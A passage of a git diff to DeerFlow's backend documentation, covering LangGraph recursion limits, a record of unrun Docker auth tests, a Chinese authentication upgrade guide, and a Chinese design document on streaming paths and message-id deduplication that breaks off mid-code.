- Do not use: `tools` (deprecated/invalid in current `langgraph-api` and will trigger schema validation errors)
|
||||
|
||||
**Recursion Limit:**
|
||||
|
||||
`config.recursion_limit` caps the number of graph steps LangGraph will execute
|
||||
in a single run. The `/api/langgraph/*` endpoints go straight to the LangGraph
|
||||
server and therefore inherit LangGraph's native default of **25**, which is
|
||||
too low for plan-mode or subagent-heavy runs — the agent typically errors out
|
||||
with `GraphRecursionError` after the first round of subagent results comes
|
||||
back, before the lead agent can synthesize the final answer.
|
||||
|
||||
DeerFlow's own Gateway and IM-channel paths mitigate this by defaulting to
|
||||
`100` in `build_run_config` (see `backend/app/gateway/services.py`), but
|
||||
clients calling the LangGraph API directly must set `recursion_limit`
|
||||
explicitly in the request body. `100` matches the Gateway default and is a
|
||||
safe starting point; increase it if you run deeply nested subagent graphs.
|
||||
|
||||
**Configurable Options:**
|
||||
- `model_name` (string): Override the default model
|
||||
- `thinking_enabled` (boolean): Enable extended thinking for supported models
|
||||
@@ -626,6 +642,14 @@ curl -X POST http://localhost:2026/api/langgraph/threads/abc123/runs \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"input": {"messages": [{"role": "user", "content": "Hello"}]},
|
||||
"config": {"configurable": {"model_name": "gpt-4"}}
|
||||
"config": {
|
||||
"recursion_limit": 100,
|
||||
"configurable": {"model_name": "gpt-4"}
|
||||
}
|
||||
}'
|
||||
```
|
||||
|
||||
> The `/api/langgraph/*` endpoints bypass DeerFlow's Gateway and inherit
|
||||
> LangGraph's native `recursion_limit` default of 25, which is too low for
|
||||
> plan-mode or subagent runs. Set `config.recursion_limit` explicitly — see
|
||||
> the [Create Run](#create-run) section for details.
|
||||
|
||||
@@ -0,0 +1,77 @@
|
||||
# Docker Test Gap (Section 7.4)
|
||||
|
||||
This file documents the only **un-executed** test cases from
|
||||
`backend/docs/AUTH_TEST_PLAN.md` after the full release validation pass.
|
||||
|
||||
## Why this gap exists
|
||||
|
||||
The release validation environment (sg_dev: `10.251.229.92`) **does not have
|
||||
a Docker daemon installed**. The TC-DOCKER cases are container-runtime
|
||||
behavior tests that need an actual Docker engine to spin up
|
||||
`docker/docker-compose.yaml` services.
|
||||
|
||||
```bash
|
||||
$ ssh sg_dev "which docker; docker --version"
|
||||
# (empty)
|
||||
# bash: docker: command not found
|
||||
```
|
||||
|
||||
All other test plan sections were executed against either:
|
||||
- The local dev box (Mac, all services running locally), or
|
||||
- The deployed sg_dev instance (gateway + frontend + nginx via SSH tunnel)
|
||||
|
||||
## Cases not executed
|
||||
|
||||
| Case | Title | What it covers | Why not run |
|
||||
|---|---|---|---|
|
||||
| TC-DOCKER-01 | `users.db` volume persistence | Verify the `DEER_FLOW_HOME` bind mount survives container restart | needs `docker compose up` |
|
||||
| TC-DOCKER-02 | Session persistence across container restart | `AUTH_JWT_SECRET` env var keeps cookies valid after `docker compose down && up` | needs `docker compose down/up` |
|
||||
| TC-DOCKER-03 | Per-worker rate limiter divergence | Confirms in-process `_login_attempts` dict doesn't share state across `gunicorn` workers (4 by default in the compose file); known limitation, documented | needs multi-worker container |
|
||||
| TC-DOCKER-04 | IM channels skip AuthMiddleware | Verify Feishu/Slack/Telegram dispatchers run in-container against `http://langgraph:2024` without going through nginx | needs `docker logs` |
|
||||
| TC-DOCKER-05 | Admin credentials surfacing | **Updated post-simplify** — was "log scrape", now "0600 credential file in `DEER_FLOW_HOME`". The file-based behavior is already validated by TC-1.1 + TC-UPG-13 on sg_dev (non-Docker), so the only Docker-specific gap is verifying the volume mount carries the file out to the host | needs container + host volume |
|
||||
| TC-DOCKER-06 | Gateway-mode Docker deploy | `./scripts/deploy.sh --gateway` produces a 3-container topology (no `langgraph` container); same auth flow as standard mode | needs `docker compose --profile gateway` |
|
||||
|
||||
## Coverage already provided by non-Docker tests
|
||||
|
||||
The **auth-relevant** behavior in each Docker case is already exercised by
|
||||
the test cases that ran on sg_dev or local:
|
||||
|
||||
| Docker case | Auth behavior covered by |
|
||||
|---|---|
|
||||
| TC-DOCKER-01 (volume persistence) | TC-REENT-01 on sg_dev (admin row survives gateway restart) — same SQLite file, just no container layer between |
|
||||
| TC-DOCKER-02 (session persistence) | TC-API-02/03/06 (cookie roundtrip), plus TC-REENT-04 (multi-cookie) — JWT verification is process-state-free, container restart is equivalent to `pkill uvicorn && uv run uvicorn` |
|
||||
| TC-DOCKER-03 (per-worker rate limit) | TC-GW-04 + TC-REENT-09 (single-worker rate limit + 5min expiry). The cross-worker divergence is an architectural property of the in-memory dict; no auth code path differs |
|
||||
| TC-DOCKER-04 (IM channels skip auth) | Code-level only: `app/channels/manager.py` uses `langgraph_sdk` directly with no cookie handling. The langgraph_auth handler is bypassed by going through SDK, not HTTP |
|
||||
| TC-DOCKER-05 (credential surfacing) | TC-1.1 on sg_dev (file at `~/deer-flow/backend/.deer-flow/admin_initial_credentials.txt`, mode 0600, password 22 chars) — the only Docker-unique step is whether the bind mount projects this path onto the host, which is a `docker compose` config check, not a runtime behavior change |
|
||||
| TC-DOCKER-06 (gateway-mode container) | Section 7.2 covered by TC-GW-01..05 + Section 2 (gateway-mode auth flow on sg_dev) — same Gateway code, container is just a packaging change |
|
||||
|
||||
## Reproduction steps when Docker becomes available
|
||||
|
||||
Anyone with `docker` + `docker compose` installed can close the gap by
|
||||
running the test plan section verbatim. Pre-flight:
|
||||
|
||||
```bash
|
||||
# Required on the host
|
||||
docker --version # >=24.x
|
||||
docker compose version # plugin >=2.x
|
||||
|
||||
# Required env var (otherwise sessions reset on every container restart)
|
||||
echo "AUTH_JWT_SECRET=$(python3 -c 'import secrets; print(secrets.token_urlsafe(32))')" \
|
||||
>> .env
|
||||
|
||||
# Optional: pin DEER_FLOW_HOME to a stable host path
|
||||
echo "DEER_FLOW_HOME=$HOME/deer-flow-data" >> .env
|
||||
```
|
||||
|
||||
Then run TC-DOCKER-01..06 from the test plan as written.
|
||||
|
||||
## Decision log
|
||||
|
||||
- **Not blocking the release.** The auth-relevant behavior in every Docker
|
||||
case has an already-validated equivalent on bare metal. The gap is purely
|
||||
about *container packaging* details (bind mounts, multi-worker, log
|
||||
collection), not about whether the auth code paths work.
|
||||
- **TC-DOCKER-05 was updated in place** in `AUTH_TEST_PLAN.md` to reflect
|
||||
the post-simplify reality (credentials file → 0600 file, no log leak).
|
||||
The old "grep 'Password:' in docker logs" expectation would have failed
|
||||
silently and given a false sense of coverage.
|
||||
File diff suppressed because it is too large
@@ -0,0 +1,129 @@
|
||||
# Authentication Upgrade Guide
|
||||
|
||||
DeerFlow 内置了认证模块。本文档面向从无认证版本升级的用户。
|
||||
|
||||
## 核心概念
|
||||
|
||||
认证模块采用**始终强制**策略:
|
||||
|
||||
- 首次启动时自动创建 admin 账号,随机密码打印到控制台日志
|
||||
- 认证从一开始就是强制的,无竞争窗口
|
||||
- 历史对话(升级前创建的 thread)自动迁移到 admin 名下
|
||||
|
||||
## 升级步骤
|
||||
|
||||
### 1. 更新代码
|
||||
|
||||
```bash
|
||||
git pull origin main
|
||||
cd backend && make install
|
||||
```
|
||||
|
||||
### 2. 首次启动
|
||||
|
||||
```bash
|
||||
make dev
|
||||
```
|
||||
|
||||
控制台会输出:
|
||||
|
||||
```
|
||||
============================================================
|
||||
Admin account created on first boot
|
||||
Email: admin@deerflow.dev
|
||||
Password: aB3xK9mN_pQ7rT2w
|
||||
Change it after login: Settings → Account
|
||||
============================================================
|
||||
```
|
||||
|
||||
如果未登录就重启了服务,不用担心——只要 setup 未完成,每次启动都会重置密码并重新打印到控制台。
|
||||
|
||||
### 3. 登录
|
||||
|
||||
访问 `http://localhost:2026/login`,使用控制台输出的邮箱和密码登录。
|
||||
|
||||
### 4. 修改密码
|
||||
|
||||
登录后进入 Settings → Account → Change Password。
|
||||
|
||||
### 5. 添加用户(可选)
|
||||
|
||||
其他用户通过 `/login` 页面注册,自动获得 **user** 角色。每个用户只能看到自己的对话。
|
||||
|
||||
## 安全机制
|
||||
|
||||
| 机制 | 说明 |
|
||||
|------|------|
|
||||
| JWT HttpOnly Cookie | Token 不暴露给 JavaScript,防止 XSS 窃取 |
|
||||
| CSRF Double Submit Cookie | 所有 POST/PUT/DELETE 请求需携带 `X-CSRF-Token` |
|
||||
| bcrypt 密码哈希 | 密码不以明文存储 |
|
||||
| 多租户隔离 | 用户只能访问自己的 thread |
|
||||
| HTTPS 自适应 | 检测 `x-forwarded-proto`,自动设置 `Secure` cookie 标志 |
|
||||
|
||||
## 常见操作
|
||||
|
||||
### 忘记密码
|
||||
|
||||
```bash
|
||||
cd backend
|
||||
|
||||
# 重置 admin 密码
|
||||
python -m app.gateway.auth.reset_admin
|
||||
|
||||
# 重置指定用户密码
|
||||
python -m app.gateway.auth.reset_admin --email user@example.com
|
||||
```
|
||||
|
||||
会输出新的随机密码。
|
||||
|
||||
### 完全重置
|
||||
|
||||
删除用户数据库,重启后自动创建新 admin:
|
||||
|
||||
```bash
|
||||
rm -f backend/.deer-flow/users.db
|
||||
# 重启服务,控制台输出新密码
|
||||
```
|
||||
|
||||
## 数据存储
|
||||
|
||||
| 文件 | 内容 |
|
||||
|------|------|
|
||||
| `.deer-flow/users.db` | SQLite 用户数据库(密码哈希、角色) |
|
||||
| `.env` 中的 `AUTH_JWT_SECRET` | JWT 签名密钥(未设置时自动生成临时密钥,重启后 session 失效) |
|
||||
|
||||
### 生产环境建议
|
||||
|
||||
```bash
|
||||
# 生成持久化 JWT 密钥,避免重启后所有用户需重新登录
|
||||
python -c "import secrets; print(secrets.token_urlsafe(32))"
|
||||
# 将输出添加到 .env:
|
||||
# AUTH_JWT_SECRET=<生成的密钥>
|
||||
```
|
||||
|
||||
## API 端点
|
||||
|
||||
| 端点 | 方法 | 说明 |
|
||||
|------|------|------|
|
||||
| `/api/v1/auth/login/local` | POST | 邮箱密码登录(OAuth2 form) |
|
||||
| `/api/v1/auth/register` | POST | 注册新用户(user 角色) |
|
||||
| `/api/v1/auth/logout` | POST | 登出(清除 cookie) |
|
||||
| `/api/v1/auth/me` | GET | 获取当前用户信息 |
|
||||
| `/api/v1/auth/change-password` | POST | 修改密码 |
|
||||
| `/api/v1/auth/setup-status` | GET | 检查 admin 是否存在 |
|
||||
|
||||
## 兼容性
|
||||
|
||||
- **标准模式**(`make dev`):完全兼容,admin 自动创建
|
||||
- **Gateway 模式**(`make dev-pro`):完全兼容
|
||||
- **Docker 部署**:完全兼容,`.deer-flow/users.db` 需持久化卷挂载
|
||||
- **IM 渠道**(Feishu/Slack/Telegram):通过 LangGraph SDK 通信,不经过认证层
|
||||
- **DeerFlowClient**(嵌入式):不经过 HTTP,不受认证影响
|
||||
|
||||
## 故障排查
|
||||
|
||||
| 症状 | 原因 | 解决 |
|
||||
|------|------|------|
|
||||
| 启动后没看到密码 | admin 已存在(非首次启动) | 用 `reset_admin` 重置,或删 `users.db` |
|
||||
| 登录后 POST 返回 403 | CSRF token 缺失 | 确认前端已更新 |
|
||||
| 重启后需要重新登录 | `AUTH_JWT_SECRET` 未持久化 | 在 `.env` 中设置固定密钥 |
|
||||
@@ -192,8 +192,8 @@ tools:
|
||||
```
|
||||
|
||||
**Built-in Tools**:
|
||||
- `web_search` - Search the web (Tavily)
|
||||
- `web_fetch` - Fetch web pages (Jina AI)
|
||||
- `web_search` - Search the web (DuckDuckGo, Tavily, Exa, InfoQuest, Firecrawl)
|
||||
- `web_fetch` - Fetch web pages (Jina AI, Exa, InfoQuest, Firecrawl)
|
||||
- `ls` - List directory contents
|
||||
- `read_file` - Read file contents
|
||||
- `write_file` - Write file contents
|
||||
|
||||
@@ -15,6 +15,7 @@ This directory contains detailed documentation for the DeerFlow backend.
|
||||
|
||||
| Document | Description |
|
||||
|----------|-------------|
|
||||
| [STREAMING.md](STREAMING.md) | Token-level streaming design: Gateway vs DeerFlowClient paths, `stream_mode` semantics, per-id dedup |
|
||||
| [FILE_UPLOAD.md](FILE_UPLOAD.md) | File upload functionality |
|
||||
| [PATH_EXAMPLES.md](PATH_EXAMPLES.md) | Path types and usage examples |
|
||||
| [summarization.md](summarization.md) | Context summarization feature |
|
||||
@@ -47,6 +48,7 @@ docs/
|
||||
├── PATH_EXAMPLES.md # Path usage examples
|
||||
├── summarization.md # Summarization feature
|
||||
├── plan_mode_usage.md # Plan mode feature
|
||||
├── STREAMING.md # Token-level streaming design
|
||||
├── AUTO_TITLE_GENERATION.md # Title generation
|
||||
├── TITLE_GENERATION_IMPLEMENTATION.md # Title implementation details
|
||||
└── TODO.md # Roadmap and issues
|
||||
|
||||
@@ -0,0 +1,351 @@
|
||||
# DeerFlow 流式输出设计
|
||||
|
||||
本文档解释 DeerFlow 是如何把 LangGraph agent 的事件流端到端送到两类消费者(HTTP 客户端、嵌入式 Python 调用方)的:两条路径为什么**必须**并存、它们各自的契约是什么、以及设计里那些 non-obvious 的不变式。
|
||||
|
||||
---
|
||||
|
||||
## TL;DR
|
||||
|
||||
- DeerFlow 有**两条并行**的流式路径:**Gateway 路径**(async / HTTP SSE / JSON 序列化)服务浏览器和 IM 渠道;**DeerFlowClient 路径**(sync / in-process / 原生 LangChain 对象)服务 Jupyter、脚本、测试。它们**无法合并**——消费者模型不同。
|
||||
- 两条路径都从 `create_agent()` 工厂出发,核心都是订阅 LangGraph 的 `stream_mode=["values", "messages", "custom"]`。`values` 是节点级 state 快照,`messages` 是 LLM token 级 delta,`custom` 是显式 `StreamWriter` 事件。**这三种模式不是详细程度的梯度,是三个独立的事件源**,要 token 流就必须显式订阅 `messages`。
|
||||
- 嵌入式 client 为每个 `stream()` 调用维护三个 `set[str]`:`seen_ids` / `streamed_ids` / `counted_usage_ids`。三者看起来相似但管理**三个独立的不变式**,不能合并。
|
||||
|
||||
---
|
||||
|
||||
## 为什么有两条流式路径
|
||||
|
||||
两条路径服务的消费者模型根本不同:
|
||||
|
||||
| 维度 | Gateway 路径 | DeerFlowClient 路径 |
|
||||
|---|---|---|
|
||||
| 入口 | FastAPI `/runs/stream` endpoint | `DeerFlowClient.stream(message)` |
|
||||
| 触发层 | `runtime/runs/worker.py::run_agent` | `packages/harness/deerflow/client.py::DeerFlowClient.stream` |
|
||||
| 执行模型 | `async def` + `agent.astream()` | sync generator + `agent.stream()` |
|
||||
| 事件传输 | `StreamBridge`(asyncio Queue)+ `sse_consumer` | 直接 `yield` |
|
||||
| 序列化 | `serialize(chunk)` → 纯 JSON dict,匹配 LangGraph Platform wire 格式 | `StreamEvent.data`,携带原生 LangChain 对象 |
|
||||
| 消费者 | 前端 `useStream` React hook、飞书/Slack/Telegram channel、LangGraph SDK 客户端 | Jupyter notebook、集成测试、内部 Python 脚本 |
|
||||
| 生命周期管理 | `RunManager`:run_id 跟踪、disconnect 语义、multitask 策略、heartbeat | 无;函数返回即结束 |
|
||||
| 断连恢复 | `Last-Event-ID` SSE 重连 | 无需要 |
|
||||
|
||||
**两条路径的存在是 DRY 的刻意妥协**:Gateway 的全部基础设施(async + Queue + JSON + RunManager)**都是为了跨网络边界把事件送给 HTTP 消费者**。当生产者(agent)和消费者(Python 调用栈)在同一个进程时,这整套东西都是纯开销。
|
||||
|
||||
### 为什么不能让 DeerFlowClient 复用 Gateway
|
||||
|
||||
曾经考虑过三种复用方案,都被否决:
|
||||
|
||||
1. **让 `client.stream()` 变成 `async def client.astream()`**
|
||||
breaking change。用户用不上的 `async for` / `asyncio.run()` 要硬塞进 Jupyter notebook 和同步脚本。DeerFlowClient 的一大卖点("把 agent 当普通函数调用")直接消失。
|
||||
|
||||
2. **在 `client.stream()` 内部起一个独立事件循环线程,用 `StreamBridge` 在 sync/async 之间做桥接**
|
||||
引入线程池、队列、信号量。为了"消除重复",把**复杂度**代替代码行数引进来。是典型的"wrong abstraction"——开销高于复用收益。
|
||||
|
||||
3. **让 `run_agent` 自己兼容 sync mode**
|
||||
给 Gateway 加一条用不到的死分支,污染 worker.py 的焦点。
|
||||
|
||||
所以两条路径的事件处理逻辑会**相似但不共享**。这是刻意设计,不是疏忽。
|
||||
|
||||
---
|
||||
|
||||
## LangGraph `stream_mode` 三层语义
|
||||
|
||||
LangGraph 的 `agent.stream(stream_mode=[...])` 是**多路复用**接口:一次订阅多个 mode,每个 mode 是一个独立的事件源。三种核心 mode:
|
||||
|
||||
```mermaid
|
||||
flowchart LR
|
||||
classDef values fill:#B8C5D1,stroke:#5A6B7A,color:#2C3E50
|
||||
classDef messages fill:#C9B8A8,stroke:#7A6B5A,color:#2C3E50
|
||||
classDef custom fill:#B5C4B1,stroke:#5A7A5A,color:#2C3E50
|
||||
|
||||
subgraph LG["LangGraph agent graph"]
|
||||
direction TB
|
||||
Node1["node: LLM call"]
|
||||
Node2["node: tool call"]
|
||||
Node3["node: reducer"]
|
||||
end
|
||||
|
||||
LG -->|"每个节点完成后"| V["values: 完整 state 快照"]
|
||||
Node1 -->|"LLM 每产生一个 token"| M["messages: (AIMessageChunk, meta)"]
|
||||
Node1 -->|"StreamWriter.write()"| C["custom: 任意 dict"]
|
||||
|
||||
class V values
|
||||
class M messages
|
||||
class C custom
|
||||
```
|
||||
|
||||
| Mode | 发射时机 | Payload | 粒度 |
|
||||
|---|---|---|---|
|
||||
| `values` | 每个 graph 节点完成后 | 完整 state dict(title、messages、artifacts)| 节点级 |
|
||||
| `messages` | LLM 每次 yield 一个 chunk;tool 节点完成时 | `(AIMessageChunk \| ToolMessage, metadata_dict)` | token 级 |
|
||||
| `custom` | 用户代码显式调用 `StreamWriter.write()` | 任意 dict | 应用定义 |
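
一个按 mode 分发的最小示意(`agent` 假设为已编译的 LangGraph 图,例如 `create_agent()` 的返回值;输入 shape 仅作演示):

```python
from langchain_core.messages import AIMessageChunk


def consume(agent, user_text: str) -> None:
    """订阅三个 mode,并按 (mode, chunk) 元组分发处理。"""
    for mode, chunk in agent.stream(
        {"messages": [("user", user_text)]},
        stream_mode=["values", "messages", "custom"],
    ):
        if mode == "values":
            _snapshot = chunk  # 节点级完整 state 快照
        elif mode == "messages":
            msg, _metadata = chunk  # token 级 delta:(AIMessageChunk | ToolMessage, metadata)
            if isinstance(msg, AIMessageChunk) and msg.content:
                print(msg.content, end="", flush=True)
        elif mode == "custom":
            print("custom:", chunk)  # StreamWriter.write() 显式写入的任意 dict
```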
|
||||
|
||||
### 两套命名的由来
|
||||
|
||||
同一件事在**三个协议层**有三个名字:
|
||||
|
||||
```
|
||||
Application HTTP / SSE LangGraph Graph
|
||||
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
|
||||
│ frontend │ │ LangGraph │ │ agent.astream│
|
||||
│ useStream │──"messages- │ Platform SDK │──"messages"──│ graph.astream│
|
||||
│ Feishu IM │ tuple"──────│ HTTP wire │ │ │
|
||||
└──────────────┘ └──────────────┘ └──────────────┘
|
||||
```
|
||||
|
||||
- **Graph 层**(`agent.stream` / `agent.astream`):LangGraph Python 直接 API,mode 叫 **`"messages"`**。
|
||||
- **Platform SDK 层**(`langgraph-sdk` HTTP client):跨进程 HTTP 契约,mode 叫 **`"messages-tuple"`**。
|
||||
- **Gateway worker** 显式做翻译:`if m == "messages-tuple": lg_modes.append("messages")`(`runtime/runs/worker.py:117-121`)。
|
||||
|
||||
**后果**:`DeerFlowClient.stream()` 直接调 `agent.stream()`(Graph 层),所以必须传 `"messages"`。`app/channels/manager.py` 通过 `langgraph-sdk` 走 HTTP SDK,所以传 `"messages-tuple"`。**这两个字符串不能互相替代**,也不能抽成"一个共享常量"——它们是不同协议层的 type alias,共享只会让某一层说不是它母语的话。
|
||||
|
||||
---
|
||||
|
||||
## Gateway 路径:async + HTTP SSE
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant Client as HTTP Client
|
||||
participant API as FastAPI<br/>thread_runs.py
|
||||
participant Svc as services.py<br/>start_run
|
||||
participant Worker as worker.py<br/>run_agent (async)
|
||||
participant Bridge as StreamBridge<br/>(asyncio.Queue)
|
||||
participant Agent as LangGraph<br/>agent.astream
|
||||
participant SSE as sse_consumer
|
||||
|
||||
Client->>API: POST /runs/stream
|
||||
API->>Svc: start_run(body)
|
||||
Svc->>Bridge: create bridge
|
||||
Svc->>Worker: asyncio.create_task(run_agent(...))
|
||||
Svc-->>API: StreamingResponse(sse_consumer)
|
||||
API-->>Client: event-stream opens
|
||||
|
||||
par worker (producer)
|
||||
Worker->>Agent: astream(stream_mode=lg_modes)
|
||||
loop 每个 chunk
|
||||
Agent-->>Worker: (mode, chunk)
|
||||
Worker->>Bridge: publish(run_id, event, serialize(chunk))
|
||||
end
|
||||
Worker->>Bridge: publish_end(run_id)
|
||||
and sse_consumer (consumer)
|
||||
SSE->>Bridge: subscribe(run_id)
|
||||
loop 每个 event
|
||||
Bridge-->>SSE: StreamEvent
|
||||
SSE-->>Client: "event: <name>\ndata: <json>\n\n"
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
关键组件:
|
||||
|
||||
- `runtime/runs/worker.py::run_agent` — 在 `asyncio.Task` 里跑 `agent.astream()`,把每个 chunk 通过 `serialize(chunk, mode=mode)` 转成 JSON,再 `bridge.publish()`。
|
||||
- `runtime/stream_bridge` — 抽象 Queue。`publish/subscribe` 解耦生产者和消费者,支持 `Last-Event-ID` 重连、心跳、多订阅者 fan-out。
|
||||
- `app/gateway/services.py::sse_consumer` — 从 bridge 订阅,格式化为 SSE wire 帧。
|
||||
- `runtime/serialization.py::serialize` — mode-aware 序列化;`messages` mode 下 `serialize_messages_tuple` 把 `(chunk, metadata)` 转成 `[chunk.model_dump(), metadata]`。
|
||||
|
||||
**`StreamBridge` 的存在价值**:当生产者(`run_agent` 任务)和消费者(HTTP 连接)在不同的 asyncio task 里运行时,需要一个可以跨 task 传递事件的中介。Queue 同时还承担断连重连的 buffer 和多订阅者的 fan-out。
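
一个去掉所有附加职责的 bridge 最小示意(仅保留 publish/subscribe 解耦;真实 `StreamBridge` 的 Last-Event-ID 重连、心跳、多订阅者 fan-out 在此全部省略,类名与方法名均为假设):

```python
import asyncio
from dataclasses import dataclass, field


@dataclass
class MiniBridge:
    """单订阅者、无重连与心跳的事件桥示意。"""

    _queues: dict[str, asyncio.Queue] = field(default_factory=dict)

    def _queue(self, run_id: str) -> asyncio.Queue:
        return self._queues.setdefault(run_id, asyncio.Queue())

    async def publish(self, run_id: str, event: dict | None) -> None:
        # None 作为结束哨兵,对应真实实现里的 publish_end()
        await self._queue(run_id).put(event)

    async def subscribe(self, run_id: str):
        queue = self._queue(run_id)
        while (event := await queue.get()) is not None:
            yield event
```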
|
||||
|
||||
---
|
||||
|
||||
## DeerFlowClient 路径:sync + in-process
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant User as Python caller
|
||||
participant Client as DeerFlowClient.stream
|
||||
participant Agent as LangGraph<br/>agent.stream (sync)
|
||||
|
||||
User->>Client: for event in client.stream("hi"):
|
||||
Client->>Agent: stream(stream_mode=["values","messages","custom"])
|
||||
loop 每个 chunk
|
||||
Agent-->>Client: (mode, chunk)
|
||||
Client->>Client: 分发 mode<br/>构建 StreamEvent
|
||||
Client-->>User: yield StreamEvent
|
||||
end
|
||||
Client-->>User: yield StreamEvent(type="end")
|
||||
```
|
||||
|
||||
对比之下,sync 路径的移动部件明显更少(列表之后附一个最小用法示意):
|
||||
|
||||
- 没有 `RunManager` —— 一次 `stream()` 调用对应一次生命周期,无需 run_id。
|
||||
- 没有 `StreamBridge` —— 直接 `yield`,生产和消费在同一个 Python 调用栈,不需要跨 task 中介。
|
||||
- 没有 JSON 序列化 —— `StreamEvent.data` 直接装原生 LangChain 对象(`AIMessage.content`、`usage_metadata` 的 `UsageMetadata` TypedDict)。Jupyter 用户拿到的是真正的类型,不是匿名 dict。
|
||||
- 没有 asyncio —— 调用者可以直接 `for event in ...`,不必写 `async for`。
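
一个最小用法示意(模块导入路径与构造参数均为假设,以仓库实际导出为准;事件字段沿用本文 `chat()` 示例里的形状):

```python
from deerflow.client import DeerFlowClient  # 导入路径为假设

client = DeerFlowClient()
for event in client.stream("介绍一下 DeerFlow"):
    if event.type == "messages-tuple" and event.data.get("type") == "ai":
        print(event.data.get("content", ""), end="", flush=True)  # token 级增量
    elif event.type == "end":
        print("\nusage:", event.data.get("usage"))
```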
|
||||
|
||||
---
|
||||
|
||||
## 消费语义:delta vs cumulative
|
||||
|
||||
LangGraph `messages` mode 给出的是 **delta**:每个 `AIMessageChunk.content` 只包含这一次新 yield 的 token,**不是**从头的累计文本。
|
||||
|
||||
这个语义和 LangChain 的 `fs2 Stream` 风格一致:**上游发增量,下游负责累加**。Gateway 路径里前端 `useStream` React hook 自己维护累加器;DeerFlowClient 路径里 `chat()` 方法替调用者做累加。
|
||||
|
||||
### `DeerFlowClient.chat()` 的 O(n) 累加器
|
||||
|
||||
```python
|
||||
chunks: dict[str, list[str]] = {}
|
||||
last_id: str = ""
|
||||
for event in self.stream(message, thread_id=thread_id, **kwargs):
|
||||
if event.type == "messages-tuple" and event.data.get("type") == "ai":
|
||||
msg_id = event.data.get("id") or ""
|
||||
delta = event.data.get("content", "")
|
||||
if delta:
|
||||
chunks.setdefault(msg_id, []).append(delta)
|
||||
last_id = msg_id
|
||||
return "".join(chunks.get(last_id, ()))
|
||||
```
|
||||
|
||||
**为什么不是 `buffers[id] = buffers.get(id,"") + delta`**:CPython 的字符串 in-place concat 优化仅在 refcount=1 且 LHS 是 local name 时生效;这里字符串存在 dict 里被 reassign,优化失效,每次都是 O(n) 拷贝 → 总体 O(n²)。实测 50 KB / 5000 chunk 的回复要 100-300ms 纯拷贝开销。用 `list` + `"".join()` 是 O(n)。
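
可以用一个小基准直观感受两种写法的差距(数字依机器而异,仅作示意):

```python
import time


def concat_in_dict(deltas: list[str]) -> str:
    buffers: dict[str, str] = {}
    for d in deltas:
        buffers["ai-1"] = buffers.get("ai-1", "") + d  # 每次整串拷贝,总体 O(n^2)
    return buffers["ai-1"]


def join_lists(deltas: list[str]) -> str:
    chunks: dict[str, list[str]] = {}
    for d in deltas:
        chunks.setdefault("ai-1", []).append(d)  # 追加 O(1)
    return "".join(chunks["ai-1"])  # 最后一次性 O(n) 拼接


deltas = ["x" * 10] * 5000  # 约 50 KB、5000 个 chunk,与正文量级一致
for fn in (concat_in_dict, join_lists):
    start = time.perf_counter()
    fn(deltas)
    print(fn.__name__, f"{(time.perf_counter() - start) * 1000:.1f} ms")
```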
|
||||
|
||||
---
|
||||
|
||||
## 三个 id set 为什么不能合并
|
||||
|
||||
`DeerFlowClient.stream()` 在一次调用生命周期内维护三个 `set[str]`:
|
||||
|
||||
```python
|
||||
seen_ids: set[str] = set() # values 路径内部 dedup
|
||||
streamed_ids: set[str] = set() # messages → values 跨模式 dedup
|
||||
counted_usage_ids: set[str] = set() # usage_metadata 幂等计数
|
||||
```
|
||||
|
||||
乍看像是"三份几乎一样的东西",实际每个管**不同的不变式**。
|
||||
|
||||
| Set | 负责的不变式 | 被谁填充 | 被谁查询 |
|
||||
|---|---|---|---|
|
||||
| `seen_ids` | 连续两个 `values` 快照里同一条 message 只生成一个 `messages-tuple` 事件 | values 分支每处理一条消息就加入 | values 分支处理下一条消息前检查 |
|
||||
| `streamed_ids` | 如果一条消息已经通过 `messages` 模式 token 级流过,values 快照到达时**不要**再合成一次完整 `messages-tuple` | messages 分支每发一个 AI/tool 事件就加入 | values 分支看到消息时检查 |
|
||||
| `counted_usage_ids` | 同一个 `usage_metadata` 在 messages 末尾 chunk 和 values 快照的 final AIMessage 里各带一份,**累计总量只算一次** | `_account_usage()` 每次接受 usage 就加入 | `_account_usage()` 每次调用时检查 |
|
||||
|
||||
### 为什么不能只用一个 set
|
||||
|
||||
关键观察:**同一个 message id 在这三个 set 里的加入时机不同**。
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant M as messages mode
|
||||
participant V as values mode
|
||||
participant SS as streamed_ids
|
||||
participant SU as counted_usage_ids
|
||||
participant SE as seen_ids
|
||||
|
||||
Note over M: 第一个 AI text chunk 到达
|
||||
M->>SS: add(msg_id)
|
||||
Note over M: 最后一个 chunk 带 usage
|
||||
M->>SU: add(msg_id)
|
||||
Note over V: snapshot 到达,包含同一条 AI message
|
||||
V->>SE: add(msg_id)
|
||||
V->>SS: 查询 → 已存在,跳过文本合成
|
||||
V->>SU: 查询 → 已存在,不重复计数
|
||||
```
|
||||
|
||||
- `seen_ids` **永远在 values 快照到达时**加入,所以它是 "values 已处理" 的标记。一条只出现在 messages 流里的消息(罕见但可能),`seen_ids` 里永远没有它。
|
||||
- `streamed_ids` **在 messages 流的第一个有效事件时**加入。一条只通过 values 快照到达的非 AI 消息(HumanMessage、被 truncate 的 tool 消息),`streamed_ids` 里永远没有它。
|
||||
- `counted_usage_ids` **只在看到非空 `usage_metadata` 时**加入。一条完全没有 usage 的消息(tool message、错误消息)永远不会进去。
|
||||
|
||||
**集合包含关系**:`counted_usage_ids ⊆ (streamed_ids ∪ seen_ids)` 大致成立,但**不是严格子集**,因为一条消息可以在 messages 模式流完 text 但**在最后那个带 usage 的 chunk 之前**就被 values snapshot 赶上——此时它已经在 `streamed_ids` 里,但还不在 `counted_usage_ids` 里。把它们合并成一个 dict-of-flags 会让这个微妙的时序依赖**从类型系统里消失**,变成注释里的一句话。三个独立的 set 把不变式显式化了:每个 set 名对应一个可以口头回答的问题。
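
把上面的不变式落到代码上,大致是下面这个形状(事件字段、emit_* 占位函数与分支细节均为示意,真实实现见 `DeerFlowClient.stream`):

```python
seen_ids: set[str] = set()           # values 路径内部 dedup
streamed_ids: set[str] = set()       # messages -> values 跨模式 dedup
counted_usage_ids: set[str] = set()  # usage_metadata 幂等计数
total_usage: dict[str, int] = {}


def emit_token_delta(msg) -> None:   # 占位:真实实现里是 yield StreamEvent(...)
    print("delta:", msg.content)


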